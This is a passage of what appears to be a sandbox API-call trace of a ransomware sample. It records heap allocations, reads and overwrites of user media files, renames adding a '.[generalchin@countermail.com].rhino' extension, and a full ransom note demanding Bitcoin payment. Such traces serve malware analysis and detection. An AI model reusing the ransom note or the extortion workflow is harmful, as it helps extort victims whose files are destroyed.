lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.862] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.864] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.865] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75bd48 [0078.867] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.867] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x762828 [0078.868] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75bd48 | out: hHeap=0x6d0000) returned 1 [0078.868] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x76c858 [0078.869] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762828 | out: hHeap=0x6d0000) returned 1 [0078.870] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x77b890 [0078.871] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c858 | out: hHeap=0x6d0000) returned 1 [0078.872] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x7920c8 [0078.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77b890 | out: hHeap=0x6d0000) returned 1 [0078.874] WriteFile (in: hFile=0x124, lpBuffer=0x7920e0*, nNumberOfBytesToWrite=0x1715e, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7920e0*, lpNumberOfBytesWritten=0x4af2ac*=0x1715e, lpOverlapped=0x0) returned 1 [0078.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7920c8 | out: hHeap=0x6d0000) returned 1 [0078.875] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1715e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.875] CloseHandle (hObject=0x124) returned 1 [0079.165] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6fabf0 [0079.166] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9730 [0079.166] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fabf0 | out: hHeap=0x6d0000) returned 1 [0079.166] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Gu4AkFdp.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gu4akfdp.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Gu4AkFdp.mkv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gu4akfdp.mkv.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0079.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9730 | out: hHeap=0x6d0000) returned 1 [0079.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0079.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0079.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0079.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0079.167] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0079.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.168] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0079.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\lDEuxX-bWpZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\ldeuxx-bwpz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.168] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x17b5a [0079.168] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17c7a, nNumberOfBytesToLockHigh=0x0) returned 1 [0079.168] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.168] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0079.170] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.171] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x17b5a, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x17b5a, lpOverlapped=0x0) returned 1 [0079.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0079.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0079.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0079.172] GetLastError () returned 0x0 [0079.172] SetLastError (dwErrCode=0x0) [0079.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0079.172] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17b7d) returned 0x744cd8 [0079.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0079.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0079.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0079.173] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.173] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.173] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0079.174] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0079.174] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0079.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0079.176] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0079.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0079.176] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0079.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0079.176] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0079.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0079.176] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0079.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0079.176] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0079.176] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0079.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0079.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0079.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75c860 [0079.184] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0079.185] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x763340 [0079.190] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17c7a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0079.190] CloseHandle (hObject=0x124) returned 1 [0079.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6f36d0 [0079.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x703e78 [0079.190] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\lDEuxX-bWpZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\ldeuxx-bwpz.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\lDEuxX-bWpZ.wav.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\ldeuxx-bwpz.wav.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0079.193] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0079.193] WriteFile (in: hFile=0x124, lpBuffer=0x279dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4af304, lpOverlapped=0x0 | out: lpBuffer=0x279dd0*, lpNumberOfBytesWritten=0x4af304*=0x2a4, lpOverlapped=0x0) returned 1 [0079.195] CloseHandle (hObject=0x124) returned 1 [0079.196] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17d5b, nNumberOfBytesToLockHigh=0x0) returned 1 [0079.196] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.196] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0079.198] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.199] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x17c3b, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x17c3b, lpOverlapped=0x0) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0079.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0079.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0079.200] GetLastError () returned 0x0 [0079.200] SetLastError (dwErrCode=0x0) [0079.200] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0079.200] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x17c5e) returned 0x744cd8 [0079.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0079.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.201] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0079.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0079.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0079.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0079.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0079.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0079.202] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0079.203] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0079.203] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0079.827] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0079.827] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0079.828] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75c940 [0079.830] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0079.830] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x763420 [0079.831] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75c940 | out: hHeap=0x6d0000) returned 1 [0079.831] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x76d450 [0079.832] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763420 | out: hHeap=0x6d0000) returned 1 [0079.832] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x77c488 [0079.834] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76d450 | out: hHeap=0x6d0000) returned 1 [0079.834] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x792cc0 [0079.837] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77c488 | out: hHeap=0x6d0000) returned 1 [0079.837] WriteFile (in: hFile=0x124, lpBuffer=0x792ce0*, nNumberOfBytesToWrite=0x17d5b, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x792ce0*, lpNumberOfBytesWritten=0x4af2ac*=0x17d5b, lpOverlapped=0x0) returned 1 [0079.838] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x792cc0 | out: hHeap=0x6d0000) returned 1 [0079.838] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17d5b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0079.838] CloseHandle (hObject=0x124) returned 1 [0079.839] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x6f36d0 [0079.840] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x703e78 [0079.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0079.840] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\tD8goI-0GaEVfpr.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ibv5ekozpksyy3c2pl\\td8goi-0gaevfpr.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iBv5EKoZPKsYY3c2pl\\tD8goI-0GaEVfpr.mkv.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js 